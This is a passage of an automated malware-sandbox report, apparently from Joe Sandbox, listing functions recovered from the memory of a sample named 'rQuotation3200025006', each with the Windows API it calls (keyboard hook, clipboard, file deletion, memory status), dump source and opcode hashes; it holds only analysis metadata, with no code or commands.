                                        Function 0692BAB2 Relevance: 1.6, APIs: 1, Instructions: 70comclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: 937118bfbb00ada840d756ace4d71de0121c65888ec2d6e60489e88b8b42d3c8
                                        • Instruction ID: 22d026e501b82e85bc74e9a2c2f3e7d5cf8dabc3ed11af3efcbb2e646bbb8036
                                        • Opcode Fuzzy Hash: 937118bfbb00ada840d756ace4d71de0121c65888ec2d6e60489e88b8b42d3c8
                                        • Instruction Fuzzy Hash: 673103B0D01219DFDB10CF99C984BDEBBF5AF48308F248059E408BB298DB755985CF55
                                        Function 06929AF0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0692B075), ref: 0692B0FF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: cbdd141adc7adc255a7573d9f1638897e756aca9eb3c482f4c8392da81e1fa67
                                        • Instruction ID: 56b454d9e86ca9843c06d6ae8adf4fbf649ce2f8aaf59a40dd98d48eae0a92d9
                                        • Opcode Fuzzy Hash: cbdd141adc7adc255a7573d9f1638897e756aca9eb3c482f4c8392da81e1fa67
                                        • Instruction Fuzzy Hash: 7121CFB18083A88FCB11DF6DD8447DABFF4EF4A314F10449AD494AB256D734A848CBA5
                                        Function 0692D6AB Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,00000000), ref: 0692D66B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 7ea0b727dff6177214b736a09d70e70bf283d02371971f2ef082b053e6cdd617
                                        • Instruction ID: 9cf038f6f2574ec15c88ae9e5ed4dca2bb26dc84dfe20d0c24319394f81c5f90
                                        • Opcode Fuzzy Hash: 7ea0b727dff6177214b736a09d70e70bf283d02371971f2ef082b053e6cdd617
                                        • Instruction Fuzzy Hash: 6621F631A043558FC764EB69D88469EFBF1EF81314F24882DD0ADD7650CB39A949CF90
                                        Function 06929ED0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06929F5F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 422cea44faff9b31e163283cefa20f401e41b68affb5859b948a9f7baeac33e5
                                        • Instruction ID: ea655fff5cf9845cb80cf09daff5708be28b6c5433b0633a434a1ec99cd4f5c2
                                        • Opcode Fuzzy Hash: 422cea44faff9b31e163283cefa20f401e41b68affb5859b948a9f7baeac33e5
                                        • Instruction Fuzzy Hash: C32114B5D00259DFDB10CFAAD984ADEBFF4FB48320F24845AE958A3210C378A940CF64
                                        Function 06929ED8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06929F5F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 4ac010eda66ec5d0dbfc43d75d78ebfed30eba940b1ead7e7f3d507a03ba2e36
                                        • Instruction ID: 5d3369cd2939bb49654a66b6b59523b37e2bc9026b317aad99467f7cec68ced9
                                        • Opcode Fuzzy Hash: 4ac010eda66ec5d0dbfc43d75d78ebfed30eba940b1ead7e7f3d507a03ba2e36
                                        • Instruction Fuzzy Hash: 4321E4B5D00319AFDB10CFAAD984ADEBFF8EB48310F14841AE918A3310D374A940CFA5
                                        Function 0692D5E8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,00000000), ref: 0692D66B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: cb9ebc9547c822d8ef59d4a582f67072b20c4f66128c2fbdeb7870c5ae2299c5
                                        • Instruction ID: 1a517d560bcc2b5d00306e2e336ec44bed955df9726419ae70cf3d674633f3f6
                                        • Opcode Fuzzy Hash: cb9ebc9547c822d8ef59d4a582f67072b20c4f66128c2fbdeb7870c5ae2299c5
                                        • Instruction Fuzzy Hash: 862147B5D002199FCB14CF9AD884BDEFBF4EF88310F108429E459A7250C774A944CFA5
                                        Function 02A68038 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 02A680B0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: b0d90f506e65f1781137a4ba76c756c75e0acb88bb48c8b4a3bb6d5ab32caf7a
                                        • Instruction ID: 6442b7e3f5f34ace47f928d2acb59e3bd70b6f17d7fadc1e5b01ee81027685eb
                                        • Opcode Fuzzy Hash: b0d90f506e65f1781137a4ba76c756c75e0acb88bb48c8b4a3bb6d5ab32caf7a
                                        • Instruction Fuzzy Hash: 5B2147B5C006198FCB20CF9AC5457AEFBB4AB48320F11856AD858B7350D738A944CFA1
                                        Function 02A68040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 02A680B0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 3746be9b6765935bfe868b7f088c160521ccc463e1a9f4ed0917ae2d79472b59
                                        • Instruction ID: 38f9c99f3b3f02caaa92f0c7b7d76b68fc65d9fb6bca69d8ae92e88e5c54c1a2
                                        • Opcode Fuzzy Hash: 3746be9b6765935bfe868b7f088c160521ccc463e1a9f4ed0917ae2d79472b59
                                        • Instruction Fuzzy Hash: 4B1136B1C006199FCB10CF9AC5447AEFBF4BB48320F11856AD858A7240D778A944CFA5
                                        Function 0692B098 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0692B075), ref: 0692B0FF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 25f2bac45342685fbb7ddda898cf3d7741f06ccaecc0720673faaacee5074209
                                        • Instruction ID: dd15e53e50cc11d0339b8c08722d55bae53ec29d434ce6b374246149776cd407
                                        • Opcode Fuzzy Hash: 25f2bac45342685fbb7ddda898cf3d7741f06ccaecc0720673faaacee5074209
                                        • Instruction Fuzzy Hash: D01158B5D00219CFCB20CF9AD845BDEFBF8EB48324F20845AE518A3604C379A544CFA5
                                        Function 02A6EF70 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 02A6EFDF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 6732f23f46694e56fca8ce600c8ebb535c99993de7e8bf07dacd6b33f7b9ef73
                                        • Instruction ID: 1c7cbd13edeecd9dcb1cac952df3446cb23ff5781da63cdc35f9dcc9f3256eb2
                                        • Opcode Fuzzy Hash: 6732f23f46694e56fca8ce600c8ebb535c99993de7e8bf07dacd6b33f7b9ef73
                                        • Instruction Fuzzy Hash: 041114B5C006599FCB10CF9AC548BDEFBF4BF48324F14856AD818A7250D778A944CFA5
                                        Function 0692B3A9 Relevance: 1.6, APIs: 1, Instructions: 51comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0692B9BD
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 49942f6c63151df1b66cd180f9b054bdf2694682e72ed2ae8794019348dafd64
                                        • Instruction ID: 2ac261af27dd85a66d294b38475fc6f21d8ddb5a14351153222962285755b675
                                        • Opcode Fuzzy Hash: 49942f6c63151df1b66cd180f9b054bdf2694682e72ed2ae8794019348dafd64
                                        • Instruction Fuzzy Hash: 4F1155B4D043598FCB10DF9AD884B9EBFF8EB08314F20845AD458A7714C339A944CFA5
                                        Function 06923864 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06924F96
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 9a51cd325251b4ed9a48071dbfd76801e8c0bdffcedcbc9078d6b5874642b7ab
                                        • Instruction ID: ab30d86525ad168432c27950baeed3e50ceced83cc80c1b2afaca55d71f52dcd
                                        • Opcode Fuzzy Hash: 9a51cd325251b4ed9a48071dbfd76801e8c0bdffcedcbc9078d6b5874642b7ab
                                        • Instruction Fuzzy Hash: E01132B5C003598FCB10DF9AC844ADFFBF4EB88210F10842AD419B7614C379A544CFA1
                                        Function 06924F2B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06924F96
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: ecf92691d9522b57bfaa3e94da71a9e2b14ff518e553a21294083f1f0d0093df
                                        • Instruction ID: 72d0b98226b3aa612343cd906aa020fd554aca1232d2f474c1444a6c4c083fdb
                                        • Opcode Fuzzy Hash: ecf92691d9522b57bfaa3e94da71a9e2b14ff518e553a21294083f1f0d0093df
                                        • Instruction Fuzzy Hash: 061113B5D00359CFCB10DF9AC444ADEFBF4AB89310F14845AD459B7610C379A545CFA1
                                        Function 0692B3B8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0692B9BD
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 8b148a8efe99f15de94d27102273f8a7300e6ef8865dca9c22f267255caa1b7d
                                        • Instruction ID: a3adee9918b9856af85e97e0a518345e715b7895cd5896fdb1f940096b641b92
                                        • Opcode Fuzzy Hash: 8b148a8efe99f15de94d27102273f8a7300e6ef8865dca9c22f267255caa1b7d
                                        • Instruction Fuzzy Hash: 661145B49003198FCB20DF9AD544BDEBBF4EB48328F20845AD518B7714C374A940CFA5
                                        Function 06929B0C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0692B075), ref: 0692B0FF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 74906e5c33fb5b5900fc3f652c08bb9409e79695b05d367d22570fd1ee3b29ae
                                        • Instruction ID: 966c5fd0de9657bb67073d8fe452266684c1f2f762f6a430d8e00e38c4cf4975
                                        • Opcode Fuzzy Hash: 74906e5c33fb5b5900fc3f652c08bb9409e79695b05d367d22570fd1ee3b29ae
                                        • Instruction Fuzzy Hash: AD1136B1900359CFCB10DF99D544BDEBBF4EB48324F208459D518A7205D775A940CFA5
                                        Function 0692B961 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0692B9BD
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 899fd54485a81be360556befbc70ec55a4dca32ebb6a56ca5a10cde3655a140b
                                        • Instruction ID: bff9988532c101df0bce95093581f0a03d8e45cdf134e5b98aa0488359dcce7f
                                        • Opcode Fuzzy Hash: 899fd54485a81be360556befbc70ec55a4dca32ebb6a56ca5a10cde3655a140b
                                        • Instruction Fuzzy Hash: AA1145B9900309CFCB10DF9AD544BCEBFF4EB48324F20841AD558A7610C334A944CFA4
                                        Function 0693DBF0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 8ddefcadfbe38f5eb8f3efbc73bf231688db0afe16dae19d7766082f2042a5a8
                                        • Instruction ID: db6ff0d2699ba57d3cc9a99a3d3cb9b1620bb4e791937c712c644cc5e8f77340
                                        • Opcode Fuzzy Hash: 8ddefcadfbe38f5eb8f3efbc73bf231688db0afe16dae19d7766082f2042a5a8
                                        • Instruction Fuzzy Hash: 2F418F70E103199FDF61DFA5C8646AEBBB6BF86300F204929D405EB640EB71D94ACB91
                                        Function 0693DBDD Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 03155c1f04413d812cd5101e0eb836271bf96568812884a7f00d064d2a4b834a
                                        • Instruction ID: c42f6ed05d080f7b16248d6093fbcedddf14ac0de13e987633e36e9887cacafa
                                        • Opcode Fuzzy Hash: 03155c1f04413d812cd5101e0eb836271bf96568812884a7f00d064d2a4b834a
                                        • Instruction Fuzzy Hash: 3F41B230E103159FCF61DF65C8546AEBBB6FF86300F244929E405EB650DB70E84ACB81
                                        Function 069321BD Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: a4f336818b17528d756ee2fbe3fdf53ecb28addcab24d8b7e8464e41c4e434fa
                                        • Instruction ID: 57e6b1776497dfd973e492306547f3d0d95538a28f1f6365eb3a11ffc800a517
                                        • Opcode Fuzzy Hash: a4f336818b17528d756ee2fbe3fdf53ecb28addcab24d8b7e8464e41c4e434fa
                                        • Instruction Fuzzy Hash: 16311030B102118FDB499B74CA1476EBBE6AF8A300F244838D406EB795DF35DE46CBA5
                                        Function 069321D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 965840bc765e51fdf9419e6dd670f78fcf9e6e46cfbf330d5d23472332eb7d81
                                        • Instruction ID: 3e607f8360d68b1e8f7b4196fd61f9c306c37c45ce49897bc7c0d8a10f53e935
                                        • Opcode Fuzzy Hash: 965840bc765e51fdf9419e6dd670f78fcf9e6e46cfbf330d5d23472332eb7d81
                                        • Instruction Fuzzy Hash: E531D030B102118FDB59AB74DA1476E7BE6AB89700F204838D406EB395EF35DE46CBA5
                                        Function 060B1219 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3
                                        • API String ID: 0-1842515611
                                        • Opcode ID: 33632035693bed783141f48ba829ca796ce0dd925e7a36a4fc2e84d6746938e8
                                        • Instruction ID: bdab6c8793b186ada7fb06b38b45d778fbad8048d7d400a3623cc13fc1d2a4c0
                                        • Opcode Fuzzy Hash: 33632035693bed783141f48ba829ca796ce0dd925e7a36a4fc2e84d6746938e8
                                        • Instruction Fuzzy Hash: 41214772A402048FC741EB78D5046EF7FE2EF81304B18C8A9D14ADB352EB34DC098BA0
                                        Function 069383E0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: aa17ffd9ab63d251a76c53d8189e041860992ae9fa551ac3ff9a7d0b9a039b90
                                        • Instruction ID: 3aeaab5509920ae813943f82e0dad9e9314eb303c3e9e8ea6dcc3ef7632cacc3
                                        • Opcode Fuzzy Hash: aa17ffd9ab63d251a76c53d8189e041860992ae9fa551ac3ff9a7d0b9a039b90
                                        • Instruction Fuzzy Hash: 35F0C231B102249FDF649E55EB88679B3BDFB80314F244825E909CBE45DB31DE06C761
                                        Function 06934B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Ocq
                                        • API String ID: 0-2995510325
                                        • Opcode ID: 0769491917f9ad79c0b0790dca7da2fdd3e7273865889755b3cefda183f2b6cc
                                        • Instruction ID: 51dbbcb08849260ca75d566ea387d8d83167a6bfe7473cfbff00948a204f7feb
                                        • Opcode Fuzzy Hash: 0769491917f9ad79c0b0790dca7da2fdd3e7273865889755b3cefda183f2b6cc
                                        • Instruction Fuzzy Hash: 2FF0DA30A60129DFDB14DF94E899BAEBBB2FF88700F214519E402A7694CB741D05CB80
                                        Function 0693C2A8 Relevance: .6, Instructions: 633COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27364cbeabdb043e6483446986e20376b14c9d667d07880ac1d127af2c214f26
                                        • Instruction ID: 019df24523c2f0ac903ed064adbbc0a3f2aab364d54e6bd0da5b67468ab00afa
                                        • Opcode Fuzzy Hash: 27364cbeabdb043e6483446986e20376b14c9d667d07880ac1d127af2c214f26
                                        • Instruction Fuzzy Hash: F032BE30B00615CFDB54DB68D990BAEB7B6FB88310F208925E406EB794DB35EC42CB91
                                        Function 060B4434 Relevance: .4, Instructions: 407COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e948c36f930771a4c6d876e618ea9de62e527e33d04729a1226466fd71a5574e
                                        • Instruction ID: f50c37d163fe74d3961d00b36d44b84f078b85ce6e73ce5158601390e41fb170
                                        • Opcode Fuzzy Hash: e948c36f930771a4c6d876e618ea9de62e527e33d04729a1226466fd71a5574e
                                        • Instruction Fuzzy Hash: E141AD30D407089FCB54DFA9C8446DEBBF1FF89300F14C669E409AB255EB70AA80CB90
                                        Function 0693B343 Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b68280122229a3a3bec9ed2b29d0863d0b75fa5bcd090cf025e75218c126193
                                        • Instruction ID: 4461c4fd39e608e47f90aa25be1bac3ebcc2ef42cf80ba251bde20be57e937a0
                                        • Opcode Fuzzy Hash: 1b68280122229a3a3bec9ed2b29d0863d0b75fa5bcd090cf025e75218c126193
                                        • Instruction Fuzzy Hash: ADA1C430F101298FEF64CAA8D5947AEB7FAEB99310F304825E405E7799CA34DC818B56
                                        Function 06936300 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7bfad49491b2e610ad5b1ec5de5ca830c2010dec33ac250a1effb4d84f4a3284
                                        • Instruction ID: 38c9a6284f17bdc2d2e12fd49bbae3f6814d9ce79ab938c4660cb877c98b8ccd
                                        • Opcode Fuzzy Hash: 7bfad49491b2e610ad5b1ec5de5ca830c2010dec33ac250a1effb4d84f4a3284
                                        • Instruction Fuzzy Hash: B761B071F000215FCF549A7EC88466FBADBAFC5620B25443AE80EDB364EE65DD0287D6
                                        Function 069343B3 Relevance: .2, Instructions: 220COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af85482e6cedec01b26ad70c5b7e98fbf458ab7480771598b9e50ea7ed7094a3
                                        • Instruction ID: a85412fbe37b76c036f118f85dce0e191bf091d21096047d87edba3b2d404b59
                                        • Opcode Fuzzy Hash: af85482e6cedec01b26ad70c5b7e98fbf458ab7480771598b9e50ea7ed7094a3
                                        • Instruction Fuzzy Hash: 3B815A30B102159FDB44DFA9D4947AEB7F6AF89704F218429D40AEB394EB34DC428B91
                                        Function 069343C0 Relevance: .2, Instructions: 218COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b638413e7b76789dce789feb8da0c7dd1c5d3e07180cad22073ff8d47751498f
                                        • Instruction ID: 3ed32b6c940a01075ad3c15e15947f9909872c0bf64bfd84eb39093f03606355
                                        • Opcode Fuzzy Hash: b638413e7b76789dce789feb8da0c7dd1c5d3e07180cad22073ff8d47751498f
                                        • Instruction Fuzzy Hash: 29814930B102199FDF44DFA9D4547AEB7F6AF89704F218429D40AEB394EB30EC428B91
                                        Function 069346CC Relevance: .2, Instructions: 214COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 082163b6e5257039e8c64d7615e237c35c5de8d34109dcac33ddcfaa04becbfa
                                        • Instruction ID: 183f217107d3ce7bb7f35c21893036c730f67f2fcd55820c30d0735c693b9be0
                                        • Opcode Fuzzy Hash: 082163b6e5257039e8c64d7615e237c35c5de8d34109dcac33ddcfaa04becbfa
                                        • Instruction Fuzzy Hash: DA917C34E102198FDF60DF68C990B9DB7B1FF89700F208699D449BB395DB70AA858F51
                                        Function 069346E0 Relevance: .2, Instructions: 210COMMON
                                        Download Yara Rule
                                        Memory Dump Source
